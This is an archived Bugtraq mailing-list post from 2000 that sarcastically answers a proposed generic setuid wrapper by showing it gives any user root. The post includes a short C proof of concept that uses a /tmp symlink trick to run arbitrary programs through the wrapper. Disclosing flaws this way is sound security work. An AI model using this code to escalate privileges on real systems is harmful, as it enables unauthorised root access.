|
Bugtraq
mailing list archives
Re: Format String Attacks
From: Pavel Kankovsky <peak () ARGO TROJA MFF CUNI CZ>
Date: Wed, 13 Sep 2000 23:36:40 +0200
On Wed, 13 Sep 2000, Doug Hughes wrote:
Since I don't recall anybody else posting one, here is a simple, generic,
setuid wrapper that people could use around, for instance, /usr/bin/eject
or other setuid programs.
<ironic>
Thank you for a nice implementation of sudo that does not bother asking
for a password. Instant root for any user...very nice. But wait! It is not
complete. Here is the missing piece:
#include <malloc.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/param.h>
#include <limits.h>
int
main(int argc, char **argv, char **envp)
{
char oldpath[MAXPATHLEN];
char newpath[sizeof("/tmp/.orig") + (CHAR_BIT*sizeof(long)/3+1)];
++argv;
srandom(getpid() + 5*time());
if (argc < 2)
{ fprintf(stderr, "missing argument\n"); return 1; }
if (realpath(argv[0], oldpath) == NULL)
{ fprintf(stderr, "realpath failed\n"); return 1; }
sprintf(newpath, "/tmp/%ld.orig", random());
if (symlink(oldpath, newpath) == -1)
{ perror("symlink"); return 1; }
strrchr(newpath, '.')[0] = '\0';
argv[0] = newpath;
execve("path-to-your-wrapper", argv, envp);
perror("execve"); return 1;
}
</ironic>
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
 By Date 
By Thread
Current thread:
|
Intro
